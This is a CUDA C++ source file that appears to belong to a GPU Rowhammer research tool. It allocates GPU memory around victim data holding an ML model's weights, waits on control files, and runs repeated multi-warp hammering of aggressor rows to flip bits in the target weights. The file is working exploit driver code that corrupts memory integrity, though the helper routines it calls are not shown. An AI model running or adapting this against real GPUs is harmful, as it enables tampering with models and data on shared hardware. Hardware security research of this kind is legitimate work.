#include <atomic>
#include <chrono>
#include <fstream>
#include <rh_impls.cuh>
#include <rh_utils.cuh>
#include <iostream>
#include <numeric>
#include <pthread.h>
#include <stdint.h>
#include <vector>
#include <filesystem>
#include "allocator.cu"

/* Prefix prepended to messages printed by this tool. */
std::string CLI_PREFIX{ "(hammer_manual): " };

/* Names of the control files, relative to the working directory. */
std::string exploit_file_name{ "exploit_control.txt" };
std::string mem_file_name{ "memory_control.txt" };
std::string model_file_name{ "model_control.txt" };

/* Filesystem paths built from the names above; the names are defined first
   so they are already initialized when the paths are constructed. */
const std::filesystem::path exploit_path{ exploit_file_name };
const std::filesystem::path mem_path{ mem_file_name };
const std::filesystem::path model_path{ model_file_name };

int
main (int argc, char *argv[])
{
  const uint64_t num_victim = std::stoull (argv[2]);
  const uint64_t step = std::stoull (argv[3]);
  const uint64_t it = std::stoull (argv[4]);
  const uint64_t min_rowId = std::stoull (argv[5]);
  const uint64_t max_rowId = std::stoull (argv[6]);
  const uint64_t row_step = std::stoull (argv[7]);
  const uint64_t size = std::stoull (argv[8]);
  const uint64_t n = std::stoull (argv[9]);
  const uint64_t k = std::stoull (argv[10]);
  const uint64_t delay = std::stoull (argv[11]);
  const uint64_t period = std::stoull (argv[12]);
  const uint64_t count_iter = std::stoull (argv[13]);

  std::fstream control_file;
  auto prev_time = std::filesystem::last_write_time(exploit_path);

  /* Left side of Victim Data. Shift this to target different weights. */
  uint8_t *layout = (uint8_t *)my_malloc(size - 2L * 1024 * 1024, 0, 0);
  std::cerr << "layout: " << (void *)layout << '\n';

  /* Create space for partial victim data */
  uint8_t *target_discard = (uint8_t *)my_malloc(2L * 1024 * 1024, 0, 0);
  std::cerr << "target: " << (void *)target_discard << '\n';

  /* Allocate space for aggressors */
  uint8_t *sandwich1 = (uint8_t *)my_malloc(1L * 1024 * 1024 * 1024, 0, 0);
  std::cerr << "sandwich1: " << (void *)sandwich1 << '\n';

  /* Space for other victim data */
  uint8_t *discard = (uint8_t *)my_malloc(10L * 1024 * 1024 * 1024, 0, 0);
  std::cerr << "discard: " << (void *)discard << '\n';

  uint8_t *sandwich2 = (uint8_t *)my_malloc(35L * 1024 * 1024 * 1024 - size, 0, 0);
  std::cerr << "sandwich2: " << (void *)sandwich2 << '\n';

  my_free(target_discard, 2L * 1024 * 1024, 0, 0);
  my_free(discard, 10L * 1024 * 1024 * 1024, 0, 0);

  std::ifstream row_set_file (argv[1]);
  RowList rows = read_row_from_file (row_set_file, layout);
  row_set_file.close ();

  if ((int64_t)(rows.size () - 2 * num_victim - 1) < 0)
    {
      std::cout << CLI_PREFIX << "Error: "
                << "Not enough rows to generate the specified victims."
                << '\n';
      exit (-1);
    }

  /* Treat all rows as victim rows */
  std::vector<uint64_t> all_vics (max_rowId);

  /* Dummy hammer to keep timing consistent, due to device startup time */
  start_simple_hammer (rows, all_vics, 1);
  cudaDeviceSynchronize ();

  /* Running */
  prev_time = std::filesystem::last_write_time(exploit_path);
  std::string action;
  bool ret = false;
  while (true)
  {
    while (std::filesystem::last_write_time(exploit_path) == prev_time)
      usleep(1);
    prev_time = std::filesystem::last_write_time(exploit_path);

    if (ret)
      return 0;
    else
      ret = true;

    std::vector<uint64_t> victims; 
    std::vector<uint64_t> aggressors
        = get_aggressors (rows, min_rowId, num_victim + 1, row_step);

    for (int j = 0; j < count_iter; j++)
      {
        evict_L2cache (sandwich2);
        cudaDeviceSynchronize ();

        /* Start the hammering and measure the time */
        uint64_t time = start_multi_warp_hammer (
            rows, aggressors, it, n, k, aggressors.size (), delay, period);
      }
      evict_L2cache (sandwich2);
      cudaDeviceSynchronize ();
      control_file.open(model_file_name, std::fstream::in | std::fstream::out | std::fstream::trunc);
      control_file.close();
  }
  return 0;
}
